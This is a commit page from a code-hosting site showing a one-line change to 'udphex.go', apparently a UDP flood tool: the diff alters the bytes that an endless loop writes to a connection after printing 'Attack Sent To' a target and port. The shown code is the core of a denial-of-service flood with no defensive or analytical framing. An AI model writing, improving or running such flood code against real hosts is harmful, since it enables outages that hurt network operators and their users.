Update udphex.go
This commit is contained in:
parent
a2e09b06db
commit
1d54bc962d
1 changed files with 1 additions and 1 deletions
|
@ -15,7 +15,7 @@ func main() {
|
|||
} else {
|
||||
fmt.Println("Attack Sent To " + target + ":" + port)
|
||||
for {
|
||||
conn.Write([]byte("\x61\x73\x64"))
|
||||
conn.Write([]byte("\x31"))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in a new issue